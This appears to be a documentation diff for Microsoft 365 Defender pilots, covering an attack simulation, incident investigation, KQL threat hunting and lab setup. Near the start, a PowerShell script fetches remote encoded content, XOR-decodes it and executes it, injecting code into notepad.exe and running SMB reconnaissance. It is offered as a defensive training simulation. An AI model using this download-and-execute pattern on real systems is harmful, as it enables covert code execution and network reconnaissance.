-2. Open a Windows PowerShell window on the test device.
-
-3. Copy the following simulation script:
-
- ```powershell
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
- = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
- -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
- $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
- $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
- ```
-
- > [!NOTE]
- > If you open this document on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. Download this document and open it on Adobe Reader.
-
-4. At the prompt, paste and run the copied script.
-
-> [!NOTE]
-> If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the **CTRL-V** hotkey or right-click-paste method might not work. Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.
-
-A few seconds later, <i>notepad.exe</i> will open. A simulated attack code will be injected into notepad.exe. Keep the automatically generated Notepad instance open to experience the full scenario.
-
-The simulated attack code will attempt to communicate to an external IP address (simulating the C2 server) and then attempt reconnaissance against the domain controller through SMB.
-
-You'll see a message displayed on the PowerShell console when this script completes.
-
-```console
-ran NetSessionEnum against [DC Name] with return code result 0
-```
-
-To see the Automated Incident and Response feature in action, keep the notepad.exe process open. You'll see Automated Incident and Response stop the Notepad process.
-
-## Investigate an incident
-
-> [!NOTE]
-> Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bzwz?]
-
-Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Security Center portal.
-
-1. Open the [Microsoft 365 Security Center portal](https://security.microsoft.com/incidents) incident queue from any device.
-
-2. Navigate to **Incidents** from the menu.
-
- ![Screenshot of incidents as shown on the Microsoft 365 Security Center's left-hand side menu](../../media/mtp/fig1.png)
-
-3. The new incident for the simulated attack will appear in the incident queue.
-
- ![Screenshot of the incident queue](../../media/mtp/fig2.png)
-
-### Investigate the attack as a single incident
-
-Microsoft 365 Defender correlates analytics and aggregates all related alerts and investigations from different products into one incident entity. By doing so, Microsoft 365 Defender shows a broader attack story, allowing the SOC analyst to understand and respond to complex threats.
-
-The alerts generated during this simulation are associated with the same threat, and as a result, are automatically aggregated as a single incident.
-
-To view the incident:
-
-1. Navigate to the **Incidents** queue.
-
- ![Screenshot of incidents from the navigation menu](../../media/mtp/fig1.png)
-
-2. Select the newest item by clicking on the circle located left of the incident name. A side panel displays additional information about the incident, including all the related alerts. Each incident has a unique name that describes it based on the attributes of the alerts it includes.
-
- ![Screenshot of the incidents page where generated alerts are aggregated during the simulation](../../media/mtp/fig4.png)
-
- The alerts that show in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.
-
-3. Select **Open incident page** to get more information about the incident.
-
- In the **Incident** page, you can see all the alerts and information related to the incident. The information includes the entities and assets that are involved in the alert, the detection source of the alerts (Microsoft Defender for Identity, EDR), and the reason they were linked together. Reviewing the incident alert list shows the progression of the attack. From this view, you can see and investigate the individual alerts.
-
- You can also click **Manage incident** from the right-hand menu, to tag the incident, assign it to yourself, and add comments.
-
- ![Screenshot of where to click Manage incident](../../media/mtp/fig5a.png)
-
- ![Screenshot of the fields on the manage incident panel where you can tag the incident, assign it to yourself, and add comments](../../media/mtp/fig5b.png)
-
-### Review generated alerts
-
-Let's look at some of the alerts generated during the simulated attack.
-
-> [!NOTE]
-> We'll walk through only a few of the alerts generated during the simulated attack. Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.
-
-![Screenshot of generated alerts](../../media/mtp/fig6.png)
-
-#### Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint EDR)
-
-Advanced attackers use sophisticated and stealthy methods to persist in memory and hide from detection tools. One common technique is to operate from within a trusted system process rather than a malicious executable, making it hard for detection tools and security operations to spot the malicious code.
-
-To allow the SOC analysts to catch these advanced attacks, deep memory sensors in Microsoft Defender for Endpoint provide our cloud service with unprecedented visibility into a variety of cross-process code injection techniques. The following figure shows how Defender for Endpoint detected and alerted on the attempt to inject code to <i>notepad.exe</i>.
-
-![Screenshot of the alert for injection of potentially malicious code](../../media/mtp/fig7.png)
-
-#### Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint EDR)
-
-Microsoft Defender for Endpoint detections often target the most common attribute of an attack technique. This method ensures durability and raises the bar for attackers to switch to newer tactics.
-
-We employ large-scale learning algorithms to establish the normal behavior of common processes within an organization and worldwide and watch for when these processes show anomalous behaviors. These anomalous behaviors often indicate that extraneous code was introduced and are running in an otherwise trusted process.
-
-For this scenario, the process <i>notepad.exe</i> is exhibiting abnormal behavior, involving communication with an external location. This outcome is independent of the specific method used to introduce and execute the malicious code.
-
-> [!NOTE]
-> Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.
-
-Notice that the alert details include the external IP addressΓÇöan indicator that you can use as a pivot to expand investigation.
-
-Select the IP address in the alert process tree to view the IP address details page.
-
-![Screenshot of the alert for unexpected behavior by a process run with no command line arguments](../../media/mtp/fig8.png)
-
-The following figure displays the selected IP Address details page (clicking on IP address in the Alert process tree).
-![Screenshot of the IP address details page](../../media/mtp/fig9.png)
-
-#### Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)
-
-Enumeration using Server Message Block (SMB) protocol enables attackers to get recent user logon information that helps them move laterally through the network to access a specific sensitive account.
-
-In this detection, an alert is triggered when the SMB session enumeration runs against a domain controller.
-
-![Screenshot of the Microsoft Defender for Identity alert for User and IP address reconnaissance](../../media/mtp/fig10.png)
-
-### Review the device timeline [Microsoft Defender for Endpoint]
-
-After exploring the various alerts in this incident, navigate back to the incident page you investigated earlier. Select the **Devices** tab in the incident page to review the devices involved in this incident as reported by Microsoft Defender for Endpoint and Microsoft Defender for Identity.
-
-Select the name of the device where the attack was conducted, to open the entity page for that specific device. In that page, you can see alerts that were triggered and related events.
-
-Select the **Timeline** tab to open the device timeline and view all events and behaviors observed on the device in chronological order, interspersed with the alerts raised.
-
-![Screenshot of the device timeline with behaviors](../../media/mtp/fig11.png)
-
-Expanding some of the more interesting behaviors provides useful details, such as process trees.
-
-For example, scroll down until you find the alert event **Suspicious process injection observed**. Select the **powershell.exe injected to notepad.exe process** event below it, to display the full process tree for this behavior under the **Event entities** graph on the side pane. Use the search bar for filtering if necessary.
-
-![Screenshot of the process tree for selected PowerShell file creation behavior](../../media/mtp/fig12.png)
-
-### Review the user information [Microsoft Cloud App Security]
-
-On the incident page, select the **Users** tab to display the list of users involved in the attack. The table contains additional information about each user, including each user's **Investigation Priority** score.
-
-Select the user name to open the user's profile page where further investigation can be conducted. [Read more about investigating risky users](/cloud-app-security/tutorial-ueba#identify).
-
-![Screenshot of Cloud App Security user page](../../media/mtp/fig13.png)
-
-## Automated investigation and remediation
-
-> [!NOTE]
->Before we walk you through this simulation, watch the following video to get familiar with what automated self-healing is, where to find it in the portal, and how it can help in your security operations:
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4BzwB]
-
-Navigate back to the incident in the Microsoft 365 Security Center portal. The **Investigations** tab in the **Incident** page shows the automated investigations that were triggered by Microsoft Defender for Identity and Microsoft Defender for Endpoint. The screenshot below displays only the automated investigation triggered by Defender for Endpoint. By default, Defender for Endpoint automatically remediates the artifacts found in the queue, which requires remediation.
-
-![Screenshot of automated investigations related to the incident](../../media/mtp/fig14.png)
-
-Select the alert that triggered an investigation to open the **Investigation details** page. You'll see the following details:
--- Alert(s) that triggered the automated investigation.-- Impacted users and devices. If indicators are found on additional devices, these additional devices will be listed as well.-- List of evidence. The entities found and analyzed, such as files, processes, services, drivers, and network addresses. These entities are analyzed for possible relationships to the alert and rated as benign or malicious.-- Threats found. Known threats that are found during the investigation.-
-> [!NOTE]
-> Depending on timing, the automated investigation might still be running. Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. Refresh the **Investigation details** page to get the latest findings.
-
-![Screenshot of Investigation details page](../../media/mtp/fig15.png)
-
-During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.
-
-You can see <i>notepad.exe</i> disappear from the list of running processes on the test device.
-
-## Resolve the incident
-
-After the investigation is complete and confirmed to be remediated, close the incident.
-
-Select **Manage incident**. Set the status to **Resolve incident** and select the relevant classification.
-
-When the incident is resolved, it closes all of the associated alerts in Microsoft 365 Security Center and in the related portals.
-
-![Screenshot of the incidents page with the open Manage incident panel where you can click the switch to resolve incident](../../media/mtp/fig16.png)
-
-This wraps up the attack simulation for the incident management and automated investigation and remediation scenarios. The next simulation will take you through proactive threat hunting for potentially malicious files.
-
-## Advanced hunting scenario
-
-> [!NOTE]
-> Before we walk you through the simulation, watch the following video to understand the advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
-
-### Hunting environment requirements
-
-There's a single internal mailbox and device required for this scenario. You'll also need an external email account to send the test message.
-
-1. Verify that your tenant has [enabled Microsoft 365 Defender](m365d-enable.md#confirm-that-the-service-is-on).
-2. Identify a target mailbox to be used for receiving email.
- a. This mailbox must be monitored by Microsoft Defender for Office 365
- b. The device from requirement 3 needs to access this mailbox
-3. Configure a test device:
- a. Make sure you are using Windows 10 version 1903 or later version.
- b. Join the test device to the test domain.
- c. [Turn on Windows Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Windows Defender Antivirus, see [this troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-windows-defender-antivirus-is-not-disabled-by-a-policy).
- d. [Onboard to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
-
-### Run the simulation
-
-1. From an external email account, send an email to the mailbox identified in step 2 of the test environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or Office document such as a Word file.
-2. Open the sent email from the device configured as defined in step 3 of the test environment requirements section. Either open the attachment or save the file to the device.
-
-#### Go hunting
-
-1. Open the security.microsoft.com portal.
-
-2. Navigate to **Hunting > Advanced hunting**.
-
- ![Screenshot of advanced hunting in the M365 Security Center portal navigation bar](../../media/mtp/fig17.png)
-
-3. Build a query that starts by gathering email events.
-
- 1. From the query pane, select New.
-
- 1. Double-click on the EmailEvents table from the schema.
-
- ```console
- EmailEvents
- ```
-
- 1. Change the time frame to the last 24 hours. Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame.
-
- ![Screenshot of where you can change the time frame. Open the drop-down menu to choose from range of time frame options](../../media/mtp/fig18.png)
-
- 1. Run the query. You may have many results depending on the environment for the pilot.
-
- > [!NOTE]
- > See the next step for filtering options to limit data return.
-
- ![Screenshot of the advanced hunting query results](../../media/mtp/fig19.png)
-
- > [!NOTE]
- > Advanced hunting displays query results as tabular data. You can also opt to view the data in other format types such as charts.
-
- 1. Look at the results and see if you can identify the email you opened. It may take up to 2 hours for the message to show up in advanced hunting. If the email environment is large and there are many results, you might want to use the **Show Filters option** to find the message.
-
- In the sample, the email was sent from a Yahoo account. Click the **+** icon beside **yahoo.com** under the SenderFromDomain section and then click **Apply** to add the selected domain to the query. Use the domain or email account that was used to send the test message in step 1 of Run the Simulation to filter your results. Run the query again to get a smaller result set to verify that you see the message from the simulation.
-
- ![Screenshot of the filters. Use filters to narrow down the search, and find what you're looking for faster.](../../media/mtp/fig20.png)
-
- ```console
- EmailEvents
- | where SenderMailFromDomain == "yahoo.com"
- ```
-
- 1. Click the resulting rows from the query so you can inspect the record.
-
- ![Screenshot of the inspect record side panel which opens up when an advanced hunting result is selected](../../media/mtp/fig21.png)
-
-4. Now that you have verified that you can see the email, add a filter for the attachments. Focus on all emails with attachments in the environment. For this scenario, focus on inbound emails, not those that are being sent out from your environment. Remove any filters you have added to locate your message and add "| where **AttachmentCount > 0** and **EmailDirection** == **"Inbound""**
-
- The following query will show you the result with a shorter list than your initial query for all email events:
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- ```
-
-5. Next, include the information about the attachment (such as: file name, hashes) to your result set. To do so, join the **EmailAttachmentInfo** table. The common fields to use for joining, in this case are **NetworkMessageId** and **RecipientObjectId**.
-
- The following query also includes an additional line "| **project-rename EmailTimestamp=Timestamp**" that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- ```
-
-6. Next, use the **SHA256** value from the **EmailAttachmentInfo** table to find **DeviceFileEvents** (file actions that happened on the endpoint) for that hash. The common field here will be the SHA256 hash for the attachment.
-
- The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. The account name associated with the process will also be included.
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
- | where ActionType == "FileCreated"
- ```
-
- You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.
-
-7. Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the **FileProfile()** function enrichment:
-
- ```console
- EmailEvents
- | where AttachmentCount > 0 and EmailDirection == "Inbound"
- | project-rename EmailTimestamp=Timestamp
- | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
- | join DeviceFileEvents on SHA256
- | where ActionType == "FileCreated"
- | distinct SHA1
- | invoke FileProfile()
- ```
-
-#### Create a detection
-
-Once you have created a query that identifies information that you'd like to **get alerted** about if they happen in the future, you can create a custom detection from the query.
-
-Custom detections will run the query according to the frequency you set, and the results of the queries will create security alerts, based on the impacted assets you choose. Those alerts will be correlated to incidents and can be triaged as any other security alert generated by one of the products.
-
-1. On the query page, remove lines 7 and 8 that were added in step 7 of the Go hunting instructions and click **Create detection rule**.
-
- ![Screenshot of where you can click create detection rule in the the advanced hunting page](../../media/mtp/fig22.png)
-
- > [!NOTE]
- > If you click **Create detection rule** and you have syntax errors in your query, your detection rule won't be saved. Double-check your query to ensure there's no errors.
-
-2. Fill in the required fields with the information that will allow the security team to understand the alert, why it was generated, and what actions you expect them to take.
-
- ![Screenshot of the create detection rule page where you can define the alert details](../../media/mtp/fig23.png)
-
- Ensure that you fill out the fields with clarity to help give the next user an informed decision about this detection rule alert
-
-3. Select what entities are impacted in this alert. In this case, select **Device** and **Mailbox**.
-
- ![Screenshot of the create detection rule page where you can choose the parameters of the impacted entities](../../media/mtp/fig24.png)
-
-4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
-
- ![Screenshot of the create detection rule page where you can run an antivirus scan when an alert is triggered to help address threats](../../media/mtp/fig25.png)
-
-5. Select the scope for the alert rule. Since this query involve devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
-
- ![Screenshot of the create detection rule page where you can set the scope for the alert rule manages your expectations for the results that you'll see](../../media/mtp/fig26.png)
-
- For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
-
-6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
-
- ![Screenshot of Custom detection rules option in the menu](../../media/mtp/fig27a.png)
-
- ![Screenshot of the detection rules page which displays the rule and execution details](../../media/mtp/fig27b.png)
-
- From this page, you can select the detection rule, which will open a details page.
-
- ![Screenshot of the email attachments page where you can see the status of the rule execution, triggered alerts and actions, edit the detection, and so on](../../media/mtp/fig28.png)
-
-### Additional advanced hunting walk-through exercises
-
-To learn more about advanced hunting, the following webcasts will walk you through the capabilities of advanced hunting within Microsoft 365 Defender to create cross-pillar queries, pivot to entities and create custom detections and remediation actions.
-
-> [!NOTE]
-> Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.
-
-|Title|Description|Download MP4|Watch on YouTube|CSL file to use|
-||||||
-|Episode 1: KQL fundamentals|We'll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. Learn about available advanced hunting data and basic KQL syntax and operators.|[MP4](https://aka.ms/MTP15JUL20_MP4)|[YouTube](https://youtu.be/0D9TkGjeJwM)|[Episode 1: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.csl)|
-|Episode 2: Joins|We'll continue learning about data in advanced hunting and how to join tables together. Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join.|[MP4](https://aka.ms/MTP22JUL20_MP4)|[YouTube](https://youtu.be/LMrO6K5TWOU)|[Episode 2: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.csl)|
-|Episode 3: Summarizing, pivoting, and visualizing data|Now that we're able to filter, manipulate, and join data, it's time to start summarizing, quantifying, pivoting, and visualizing. In this episode, we'll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. We turn our datasets into charts that can help improve analysis.|[MP4](https://aka.ms/MTP29JUL20_MP4)|[YouTube](https://youtu.be/UKnk9U1NH6Y)|[Episode 3: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.csl)|
-|Episode 4: Let's hunt! Applying KQL to incident tracking|Time to track some attacker activity! In this episode, we'll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response.|[MP4](https://aka.ms/MTP5AUG20_MP4)|[YouTube](https://youtu.be/2EUxOc_LNd8)|[Episode 4: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.csl)|
-|
-
-## Next step
-
-|![Closing and summary phase](../../medi)|Analyze your Microsoft 365 Defender pilot outcome, present them to your stakeholders, and take the next step.
-|:--|:--|
security M365d Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/m365d-pilot.md
- Title: Run your pilot Microsoft 365 Defender project
-description: Run your pilot Microsoft 365 Defender project in production to effectively determine the benefits and adoption of Microsoft 365 Defender.
-keywords: Microsoft 365 Defender pilot, run pilot Microsoft 365 Defender project, evaluate Microsoft 365 Defender in production, Microsoft 365 Defender pilot project, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-overview
- - m365solution-pilotmtpproject
---
-# Run your pilot Microsoft 365 Defender project
---
-**Applies to:**
-- Microsoft 365 Defender--
-This guide helps you run a pilot project by providing pointers to ensure you have a well-structured plan, guiding you through using the attack simulation feature, and finally concluding the pilot with key take-aways for you to reflect on and document results.
-
-![Phases in running a Microsoft 365 Defender pilot](../../media/pilotphases.png)
--
-Running a pilot helps you effectively determine the benefit of adopting Microsoft 365 Defender. Before enabling Microsoft 365 Defender in your production environment and starting your use cases, it's best to plan to determine the tasks to accomplish for your pilot project and set the success criteria.
--
-## How to use this pilot playbook
-
-This guide provides an overview of Microsoft 365 Defender and step-by-step instructions on how to set up your pilot project.
-
-Microsoft 365 Defender is a unified pre- and post-breach enterprise defense suite that natively coordinates protection, detection, prevention, investigation, and response across endpoints, identities, email, and applications to provide integrated protection against sophisticated attacks. It does so by combining and orchestrating the following capabilities into a single security solution:
--- Microsoft Defender for Endpoint (endpoints)-- Microsoft Defender for Office 365 (email)-- Microsoft Defender for Identity (identity)-- Microsoft Cloud App Security (apps)-
-![Image of_Microsoft 365 Defender solution for users, Microsoft Defender for Identity, for endpoints Microsoft Defender for Endpoint, for cloud apps, Microsoft Cloud App Security, and for data, Microsoft Defender for Office 365](../../media/mtp/m365pillars.png)
-
-With the integrated Microsoft 365 Defender solution, security professionals can stitch together the threat signals that Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Identity, and Microsoft Cloud App Security receive, and determine the full scope and impact of the threat, how it entered the environment, what it's affected, and how it's currently impacting the organization. Microsoft 365 Defender takes automatic action to prevent or stop the attack and self-heal affected mailboxes, endpoints, and user identities. See the [Microsoft 365 Defender overview](microsoft-365-defender.md) for details.
-
-The following sample timeline varies depending on having the right resources in your environment. Some detections and workflows might need more learning time than the others.
-
-![Sample timeline in running a Microsoft 365 Defender pilot](../../media/phase-diagrams/pilot-phases.png)
-
-> [!IMPORTANT]
-> For optimum results, follow the pilot instructions as closely as possible.
-
-### Pilot playbook phases
-
-There are four phases in running a Microsoft 365 Defender pilot:
-
-|Phase | Description |
-|:-|:--|
-| [Planning](m365d-pilot-plan.md)<br> ~ 1 day| Learn what you need to consider before running your Microsoft 365 Defender pilot project: <br><br>- Scope <br> - Use cases <br>- Requirements <br>- Test plan <br> - Success criteria <br> - Scorecard
-| [Preparation](m365d-evaluation.md) <br>~2 days| Access Microsoft 365 Security Center to set up your Microsoft 365 Defender pilot environment. You'll be guided to:<br><br>- Identify stakeholders and seek sign-off for your pilot <br> - Environment considerations <br>- Access <br>- Azure Active Directory setup <br> - Configuration order <br> - Sign up for Microsoft 365 E5 Trial <br> - Configure domain <br>- Assign Microsoft 365 E5 licenses <br> - Complete the setup wizard in the portal|
-| [Attack simulation](m365d-pilot-simulate.md) <br>~2 days| To simulate an attack, you'll be guided to:<br><br>- Verify the test environment requirements <br>- Run the simulation <br>- Investigate an incident <br>- resolve the incident
-| [Closing and summary](m365d-pilot-close.md) <br>~ 1 day| When you've reached the end of the process, you'll be guided to:<br><br>- Go through your final output<br>- Present your output to your stakeholders <br>- Provide feedback <br>- Take next steps
-
-## Next step
-
-|[Planning phase](m365d-pilot-plan.md) | Plan your Microsoft 365 Defender pilot project
-|:-|:--|
security Prepare M365d Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/prepare-m365d-eval.md
- Title: Prepare your Microsoft 365 Defender trial lab environment
-description: Prepare stakeholder sign-off, timelines, environment considerations, and adoption order when setting up your Microsoft 365 Defender trial lab or pilot environment
-keywords: Microsoft 365 Defender trial prep, Microsoft 365 Defender pilot prep, prep for running a Microsoft 365 Defender pilot project, run a pilot Microsoft 365 Defender project, deploy, prepare, stakeholder, timeline, environment, endpoint, server, management, adoption
-search.product: eADQiWindows 10XVcnh
-ms.sitesec: library
-ms.pagetype: security
--
-localization_priority: Normal
--
- - M365-security-compliance
- - m365solution-scenario
- - m365solution-evalutatemtp
---
-# Prepare your Microsoft 365 Defender trial lab or pilot environment
---
-**Applies to:**
-- Microsoft 365 Defender-
-Creating a Microsoft 365 Defender trial lab or pilot environment and deploying it is a three-phase process:
-
-|![Phase 1: Prepare](../../medi) |
-|--|--|--|--|
-|*You are here!* | || |
-
-You're currently in the preparation phase.
--
-Preparation is key to any successful deployment. This section will guide you through what you need to consider as you prepare to create a trial lab or pilot environment for your Microsoft 365 Defender deployment.
-
-## Prerequisites
-Learn about the licensing, hardware and software requirements, and other configuration settings to provision and use Microsoft 365 Defender. See the minimum requirements for [Microsoft 365 Defender](/microsoft-365/security/defender/prerequisites), [Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/minimum-requirements), [Microsoft Defender for Office 365](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description), [Microsoft Defender for Identity](/azure-advanced-threat-protection/atp-prerequisites), [Microsoft Cloud App Security](/azure-advanced-threat-protection/atp-prerequisites).
-
-## Stakeholders and sign-off
-Identify all the stakeholders that are involved in the project and who may need to sign-off, review, or stay informed, whether for evaluation or running a pilot project.
-
->[!NOTE]
->Not all organizations might have the security organization maturity to have such roles. In such case, consult with your leadership team on review and approval accountabilities.
-
-Add stakeholders
-to the table below as appropriate for your organization.
--- SO = Sign-off on this project--- R = Review this project and provide input--- I = Informed of this project-
-| Name | Role | Action |
-|-||--|
-| Enter name and email | **Chief Information Security Officer (CISO)** *An executive representative who serves as sponsor inside the organization for the new technology deployment.* | SO |
-| Enter name and email | **Head of Cyber Defense Operations Center (CDOC)** *A representative from the CDOC team in charge of defining how this change is aligned with the processes in the customers security operations team.* | SO |
-| Enter name and email | **Security Architect** *A representative from the Security team in charge of defining how this change is aligned with the core Security architecture in the organization.* | R |
-| Enter name and email | **Workplace Architect** *A representative from the IT team in charge of defining how this change is aligned with the core workplace architecture in the organization.* | R |
-| Enter name and email | **Security Analyst** *A representative from the CDOC team who can provide feedback on the detection capabilities, user experience, and overall usefulness of this change from a security operations perspective.* | I |
-
-## Prepare your Azure Active Directory
-Skip this step if you have already enabled synchronization between Active Directory and Azure Active Directory on premises. Review existing best practices documentation from Azure Active Directory. The following steps are optimized to evaluate or run a pilot Microsoft 365 Defender project.
-
-1. Go to the [Azure Active Directory](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade) portal > **Azure AD Connect**.
-![Image of Azure Active Directory portal page](../../media/mtp-eval-1.png) <br>
-
-2. Click **Download** from **Microsoft Azure Active Directory Connect** and transfer it to your Domain Controller.
-![Image of Azure Active Directoru Connect download page](../../media/mtp-eval-2.png) <br>
-
-3. On the domain controller, follow the Azure Active Directory Connect wizard. Read the license terms and privacy notice and select the checkbox if you agree. Click **Continue**.
-![Image of Azure AD Connect welcome page](../../media/mtp-eval-3.png) <br>
-
-4. Navigate to **Express Settings**.
-![Image of Express Settings page](../../media/mtp-eval-4.png) <br>
-
-5. Enter your global administrator credentials. Click **Next**.
-![Image of Connect to Azure AD page where you should enter your global administrator credentials](../../media/mtp-eval-5.png) <br>
-
-6. Enter your Active Directory Domain Services enterprise administrator credentials. Click **Next**.
-![Image of Connect to AD DS page where you should enter your credentials](../../media/mtp-eval-6.png) <br>
-
-7. Click **Install** to confirm the configuration.
-![Image of configuration confirmation page](../../media/mtp-eval-7.png) <br>
-
-8. Congratulations, you have successfully configured Azure Active Directory Connect.
-![Image of a successfully configured Azure Active Directory Connect page](../../media/mtp-eval-8.png) <br>
-
-You can now [add users and groups to Active Directory](/azure-advanced-threat-protection/atp-playbook-setup-lab#bkmk_hydrate) and [configure a SAM-R policy](/azure-advanced-threat-protection/atp-playbook-setup-lab#configure-sam-r-capabilities-from-contosodc).
--
-## Configuration order
-The following table indicates the order Microsoft recommends for configuring the Microsoft 365 Defender components for your trial lab or pilot environment deployment.
-
-| Component | Description | Configuration order rank |
-|--|-||
-|Microsoft Defender for Office 365|Microsoft Defender for Office 365 safeguards your organization against malicious threats posed by email messages, links (URLs), and collaboration tools. <br> [Learn more.](/microsoft-365/security/office-365-security/defender-for-office-365) | 1 |
-|Microsoft Defender for Identity|Microsoft Defender for Identity uses Active Directory signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization. <br> [Learn more](/azure-advanced-threat-protection/).| 2 |
-|Microsoft Cloud App Security| Microsoft Cloud App Security is a Cloud Access Security Broker (CASB) that operates on multiple clouds. It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all your cloud services. <br> [Learn more](/cloud-app-security/). |3 |
-|Microsoft Defender for Endpoint | Microsoft Defender for Endpoint endpoint detection and response capabilities provide advanced attack detections that are near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a breach, and take response actions to remediate threats. <br> [Learn more.](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection) |4 |
-
-## Next step
-|![Phase 2: Setup](../../medi) | Set up your Microsoft 365 Defender trial lab or pilot environment
-|:-|:--|
security Setup M365deval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/setup-m365deval.md
ms.prod: m365-security
ms.mktglfcycl: deploy ms.sitesec: library ms.pagetype: security--++ localization_priority: Normal audience: ITPro
ms.technology: m365d
-# Set up your Microsoft 365 Defender trial lab environment
+# Set up your Microsoft 365 Defender trial in a lab environment
[!INCLUDE [Microsoft 365 Defender rebranding](../includes/microsoft-defender.md)]
ms.technology: m365d
**Applies to:** - Microsoft 365 Defender -
-Creating a Microsoft 365 Defender trial lab or pilot environment and deploying it is a three-phase process:
-
-|[![Phase 1: Prepare](../../medi) |
-|--|--|--|--|
-||*You are here!* | | |
--
-You're currently in the set up phase. Take the initial steps to access Microsoft 365 Security Center then set up your trial lab or pilot environment.
-
-Sign up for an Office 365 or Azure Active Directory subscription to generate a *.onmicrosoft.com* tenant that you can use to sign up for your Microsoft 365 E5 license.
-
->[!NOTE]
